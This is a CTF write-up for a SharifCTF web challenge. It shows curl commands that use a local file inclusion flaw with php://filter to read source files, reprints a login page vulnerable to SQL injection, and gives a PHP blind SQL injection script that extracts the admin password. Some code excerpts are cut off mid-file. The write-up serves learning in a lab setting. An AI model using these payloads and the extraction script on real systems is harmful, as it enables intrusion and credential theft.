Rating:
# Irish Home (web 200)
The admin.php page was discovered by a tiny fuzz. admin.php was prone to `Execution after redirect` vulnerability. The admin.php page reaveled show.php which had a parameter named `page`. The show.php had `Local File Inclusion` vulnerability. Source reading:
```
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../login
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../delete
# curl http://ctf.sharif.edu:8082/pages/show.php?page=php://filter/convert.base64-encode/resource=../deleted_3d5d9c1910e7c7/flag
```
delete.php
```
<div style="text-align: center;">
<h3 style="color: red;">Site is under maintenance 'til de end av dis f$#!*^% SharifCTF.</h3>
<h4>Al' destructive acshuns are disabled!</h4>
</div>
```
Login.php
```
connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT * FROM users where username=\"$username\" and BINARY password=\"$password\"";
$result = $conn->query($sql);
if (!$result)
trigger_error('Invalid query: ' . $conn->error);
if ($result->num_rows > 0) {
if(strpos($username, '"') !== false)
$text = "SQL injection detected";
else {
$_SESSION['logged_in'] = $username;
header('Location: /admin.php');
}
}
$conn->close();
}
}
echo "
<form action="/login.php" method="POST">
<div class="mdl-textfield mdl-js-textfield">
<input class="mdl-textfield__input" type="text" id="username" name="username">
<label class="mdl-textfield__label" for="username">Username</label>
</div>
<div class="mdl-textfield mdl-js-textfield">
<input class="mdl-textfield__input" type="password" id="password" name="password">
<label class="mdl-textfield__label" for="password">Password</label>
</div>
<div style="text-align: center;" class="mdl-textfield mdl-js-textfield">
<button class="btn waves-effect waves-light" type="submit">Submit</button>
</div>
</form>
$headers, 'body'=>$body);
}
function getSpecificHeader($headers, $name){
preg_match("#$name: *(.*)$#", $headers, $matches);
return $matches[1];
}
function trueOrFalse($response){
$trueValue = 'detected';
$falseValue = 'seem to';
if(strstr($response, $trueValue)!==false)
return true;
if(strstr($response, $falseValue)!==false)
return false;
return 'unknown';
}
function getChar($pos, $lb=0, $ub=128) {
$i = 0;
while(++$i) {
$M = floor($lb + ($ub-$lb)/2);
if(injection('<', $pos, $M)==1) {
$ub = $M - 1;
}
else if(injection('>', $pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
if($lb > $ub)
return -1;
}
}
function injection($condition, $position, $char){
$baseURL = 'http://ctf.sharif.edu:8082/login.php';
//echo "Pos: $position, tryin char $condition $char\n";
//password=admin&username=-1" or (select char_length(password) from users limit 0,1)>31 -- true
//password=admin&username=-1" or (select char_length(password) from users limit 0,1)>32 -- false
// length = 32
$data = 'password=test&username=-1" or ascii(substring((select password from users limit 0,1),' . $position . ',1)) ' . $condition . $char . ' -- ';
$response = customCurl($baseURL, $data, null, null, true);
return trueOrFalse($response['body']);
}
$time_start = microtime(true);
$str = '';
$i = 1;
gPrint('So far: ', 0);
while(true){
$char = getChar($i);
if(ord($char)=='0') break;
$str .= $char;
echo $char;
$i++;
}
$time_end = microtime(true);
//dividing with 60 will give the execution time in minutes other wise seconds
$execution_time = ($time_end - $time_start)/60;
//execution time of the script
echo "\n";
gPrint('Task has been finished.');
gPrint('Total Execution Time: '.(int)$execution_time.' Minute(s)');
?>
```
Password gathered: Password: **2a7da9c@088ba43a_9c1b4Xbyd231eb9** and the flag was generated by password easily.
